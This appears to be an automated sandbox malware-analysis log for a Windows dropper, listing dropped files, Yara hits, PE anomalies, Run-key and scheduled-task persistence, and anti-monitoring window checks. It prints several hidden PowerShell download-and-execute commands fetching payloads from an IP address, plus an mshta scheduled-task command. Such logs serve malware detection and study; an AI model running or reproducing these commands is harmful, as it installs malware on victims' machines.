Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: Yara match File source: 7.2.k6Sly2p.exe.56e0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.k6Sly2p.exe.56e0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2828666224.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR
Source: random[2].exe.6.dr Static PE information: 0xDA43F2C8 [Mon Jan 14 22:35:52 2086 UTC]
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_00F142DE
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 9228e21255.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x557df
Source: k6Sly2p.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: random[2].exe0.6.dr Static PE information: real checksum: 0x0 should be: 0x557df
Source: 5d2afc26b8.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: random[1].exe1.6.dr Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: k6Sly2p[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[2].exe1.6.dr Static PE information: real checksum: 0x21288c should be: 0x210b0e
Source: dc785309cb.exe.6.dr Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: skotes.exe.0.dr Static PE information: real checksum: 0x20fa2e should be: 0x219cd6
Source: DhqvS8pXj8.exe Static PE information: real checksum: 0x20fa2e should be: 0x219cd6
Source: d895046020.exe.6.dr Static PE information: real checksum: 0x21288c should be: 0x210b0e
Source: k6Sly2p.exe0.6.dr Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[2].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x74670
Source: 1e8dfbd5c2.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x74670
Source: DhqvS8pXj8.exe Static PE information: section name:
Source: DhqvS8pXj8.exe Static PE information: section name: .idata
Source: DhqvS8pXj8.exe Static PE information: section name:
Source: DhqvS8pXj8.exe Static PE information: section name: fsnlaalu
Source: DhqvS8pXj8.exe Static PE information: section name: pycumdux
Source: DhqvS8pXj8.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: fsnlaalu
Source: skotes.exe.0.dr Static PE information: section name: pycumdux
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[2].exe1.6.dr Static PE information: section name:
Source: random[2].exe1.6.dr Static PE information: section name: .idata
Source: random[2].exe1.6.dr Static PE information: section name:
Source: random[2].exe1.6.dr Static PE information: section name: voasjcay
Source: random[2].exe1.6.dr Static PE information: section name: mgtkptwk
Source: random[2].exe1.6.dr Static PE information: section name: .taggant
Source: d895046020.exe.6.dr Static PE information: section name:
Source: d895046020.exe.6.dr Static PE information: section name: .idata
Source: d895046020.exe.6.dr Static PE information: section name:
Source: d895046020.exe.6.dr Static PE information: section name: voasjcay
Source: d895046020.exe.6.dr Static PE information: section name: mgtkptwk
Source: d895046020.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name: .symtab
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_008FD91C push ecx; ret 6_2_008FD92F
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B2272 push esi; ret 7_2_027B227C
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B2256 push ebp; ret 7_2_027B2257
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B23EC push eax; ret 7_2_027B23ED
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B2450 push ebp; ret 7_2_027B255E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B2550 push ebp; ret 7_2_027B255E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B4545 push ebp; ret 7_2_027B46AE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B45D0 push ebp; ret 7_2_027B46AE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B08F8 push esp; ret 7_2_027B0906
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B098F push ebx; ret 7_2_027B099E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B3740 push ebx; ret 7_2_027B374E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B3543 push esi; ret 7_2_027B3546
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B1A78 push ebp; ret 7_2_027B1A82
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B3AFF push eax; ret 7_2_027B3B01
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B3B78 push eax; ret 7_2_027B3B86
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B3B4B push ecx; ret 7_2_027B3B4C
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B3B88 push eax; ret 7_2_027B3C16
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B397B push ebx; ret 7_2_027B397E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_027B3D79 push esp; ret 7_2_027B3D86
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_0493754F push ss; iretd 7_2_04937557
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049330F4 push ds; iretd 7_2_049330FD
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_049349E6 pushad ; ret 7_2_049349E7
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_060831B0 push ebp; iretd 7_2_060831B5
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Code function: 7_2_06083DB7 push edx; ret 7_2_06083DB8
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F30A76 push ecx; ret 8_2_00F30A89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04D03435 pushad ; iretd 13_2_04D03439
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04D031AA pushfd ; ret 13_2_04D031B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04D033AB pushad ; iretd 13_2_04D03439
Source: DhqvS8pXj8.exe Static PE information: section name: entropy: 7.084846373081339
Source: DhqvS8pXj8.exe Static PE information: section name: fsnlaalu entropy: 7.953941964036779
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.084846373081339
Source: skotes.exe.0.dr Static PE information: section name: fsnlaalu entropy: 7.953941964036779
Source: random[2].exe1.6.dr Static PE information: section name: entropy: 7.940912998585798
Source: random[2].exe1.6.dr Static PE information: section name: voasjcay entropy: 7.952788344032962
Source: d895046020.exe.6.dr Static PE information: section name: entropy: 7.940912998585798
Source: d895046020.exe.6.dr Static PE information: section name: voasjcay entropy: 7.952788344032962
Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: random[1].exe.6.dr, IAYNcYxlTFn1TcgV7Nc.cs High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: 5d2afc26b8.exe.6.dr, IAYNcYxlTFn1TcgV7Nc.cs High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe File created: C:\ProgramData\jhbbvnx\fbpbh.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

Boot Survival

Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afccf6841f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Window searched: window name: RegmonClass
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn mS3R9maupm1 /tr "mshta C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F2F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 8_2_00F2F98E
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00FA1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 8_2_00FA1C41
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
